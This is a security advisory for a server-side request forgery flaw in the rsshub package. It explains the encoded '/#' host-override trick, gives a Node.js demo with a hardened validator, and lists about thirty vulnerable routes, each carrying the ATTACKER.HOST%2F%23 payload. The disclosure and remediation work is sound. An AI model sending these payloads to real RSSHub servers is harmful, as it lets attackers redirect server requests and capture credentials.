Server-side Request Forgery (SSRF) Affecting rsshub package, versions <1.0.0-master.a66cbcf


Severity: high

Snyk CVSS

    Attack Complexity: Low
    User Interaction: Required
    Scope: Changed
    Confidentiality: High

    Threat Intelligence

    Exploit Maturity: Proof of concept

  • Snyk ID SNYK-JS-RSSHUB-3228584
  • published 12 Jan 2023
  • disclosed 11 Jan 2023
  • credit Dwi Siswanto

Introduced: 11 Jan 2023

CVE: not available. CWE: CWE-918 (Server-Side Request Forgery)

How to fix?

Upgrade rsshub to version 1.0.0-master.a66cbcf or higher.

Overview

rsshub is an RSS feed generator for sites that do not publish their own feeds (its tagline is "Make RSS Great Again!").

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). Several routes take a path parameter and interpolate it, unvalidated, into the hostname of the URL they fetch. An attacker who controls the ATTACKER.HOST domain can request an affected route with the parameter set to ATTACKER.HOST%2F%23.

%2F and %23 are the URL-encoded forward slash (/) and hash (#); the router decodes them before the route code sees the value, so the parameter arrives as ATTACKER.HOST/#. When the route builds its target from a template such as https://${input}.defined.host, the result is https://ATTACKER.HOST/#.defined.host: the intended .defined.host suffix ends up in the URL fragment, which HTTP clients never send, and the server makes its request to the attacker-controlled host instead. The response from that host is then parsed and returned as feed content, and the request itself can carry whatever headers or credentials the route normally sends (see the bitbucket route below), so the attacker can learn about the server's outbound requests or use the server as a pivot for further attacks.
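The following is an added example, not code from RSSHub or from the advisory, that models the pattern described above in Node.js: a route parameter interpolated into a hostname template, a check of which host an HTTP client would actually contact, and a hardened version that only accepts a single DNS label and re-verifies the parsed hostname. The names `defined.host`, `HOST_SUFFIX`, `buildUrlVulnerable`, `buildUrlSafe` and `requestTarget` are assumptions chosen for the illustration; no network request is made.

```javascript
// Added example (not RSSHub's code). `defined.host` stands in for whichever
// upstream site a route targets; `HOST_SUFFIX` is the fixed part of the template.
const HOST_SUFFIX = '.defined.host';

// Express-style routers percent-decode path parameters before the handler
// runs, so the handler sees `ATTACKER.HOST/#` for `ATTACKER.HOST%2F%23`.
function decodeParam(raw) {
  return decodeURIComponent(raw);
}

// Vulnerable pattern: plain string interpolation, no validation of `param`.
function buildUrlVulnerable(param) {
  return `https://${param}${HOST_SUFFIX}`;
}

// Parse the constructed URL the way an HTTP client would and report which host
// actually receives the request. `hash` is the fragment, which is never sent.
function requestTarget(urlString) {
  const u = new URL(urlString);
  return {
    host: u.hostname,
    fragment: u.hash,
    onIntendedSite: u.hostname.endsWith(HOST_SUFFIX),
  };
}

// Hardened pattern: the template expects one DNS label, so accept exactly
// that (letters, digits, hyphens, 1-63 chars, no leading/trailing hyphen).
const DNS_LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

function buildUrlSafe(param) {
  if (!DNS_LABEL.test(param)) {
    throw new Error(`invalid subdomain parameter: ${JSON.stringify(param)}`);
  }
  // Re-check the parsed result so a later change to the template cannot
  // silently reintroduce a host override (defence in depth, not a substitute
  // for the allowlist above).
  const u = new URL(`https://${param}${HOST_SUFFIX}`);
  if (u.protocol !== 'https:' || !u.hostname.endsWith(HOST_SUFFIX)) {
    throw new Error(`unexpected request target: ${u.hostname}`);
  }
  return u.toString();
}

// Demo with a benign parameter and the advisory's payload (constructed input).
const benign = decodeParam('blog');
const malicious = decodeParam('ATTACKER.HOST%2F%23'); // -> "ATTACKER.HOST/#"
console.log(requestTarget(buildUrlVulnerable(benign)));
console.log(requestTarget(buildUrlVulnerable(malicious)));
try {
  buildUrlSafe(malicious);
} catch (e) {
  console.log('rejected:', e.message);
}
```

Run with `node ssrf-demo.js`. The second `requestTarget` call reports `attacker.host` as the host with `.defined.host` relegated to the fragment, which is the behaviour the advisory describes; `buildUrlSafe` rejects the same input before any URL is built. Routes that legitimately take a whole domain as input (the javdb and mastodon routes in the list below) cannot use a single-label check and need an explicit allowlist of permitted instances instead.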

Note: The following routes are affected. ATTACKER.HOST is the attacker-controlled domain; the javdb and mastodon routes take a full domain as their parameter and therefore accept ATTACKER.HOST without the %2F%23 suffix:

  • /19lou/ATTACKER.HOST%2F%23/foo
  • /bandisoft/1/ATTACKER.HOST%2F%23
  • /bendibao/news/ATTACKER.HOST%2F%23
  • /bitbucket/commits/.* (special case: requires the BITBUCKET_USERNAME environment variable to be set to ATTACKER.HOST%2F%23)
  • /blogs/hedwig/ATTACKER.HOST%2F%23
  • /booth.pm/shop/ATTACKER.HOST%2F%23
  • /caixin/blog/ATTACKER.HOST%2F%23
  • /cnjxol/ATTACKER.HOST%2F%23
  • /dut/ATTACKER.HOST%2F%23
  • /eagle/blog/ATTACKER.HOST%2F%23
  • /engadget/ATTACKER.HOST%2F%23
  • /fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar
  • /gamme/ATTACKER.HOST%2F%23
  • /gitlab/explore/foo/ATTACKER.HOST%2F%23
  • /gumroad/ATTACKER.HOST%2F%23/foo
  • /itch/devlog/ATTACKER.HOST%2F%23/1
  • /javdb/tags/foo=bar?domain=ATTACKER.HOST
  • /mastodon/account_id/ATTACKER.HOST/1/statuses
  • /mastodon/remote/ATTACKER.HOST
  • /mastodon/timeline/ATTACKER.HOST
  • /mirror/ATTACKER.HOST%2F%23id (special case: the parameter must end with id)
  • /people/ATTACKER.HOST%2F%23
  • /pornhub/ATTACKER.HOST%2F%23/category_url/foo
  • /pornhub/ATTACKER.HOST%2F%23/model/foo
  • /pornhub/ATTACKER.HOST%2F%23/pornstar/foo
  • /pornhub/ATTACKER.HOST%2F%23/users/foo
  • /scitation/ATTACKER.HOST%2F%23/foo
  • /solidot/ATTACKER.HOST%2F%23
  • /touhougarakuta/ATTACKER.HOST%2F%23/foo
  • /yahoo-news/ATTACKER.HOST%2F%23
  • /zhubai/ATTACKER.HOST%2F%23
  • /ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar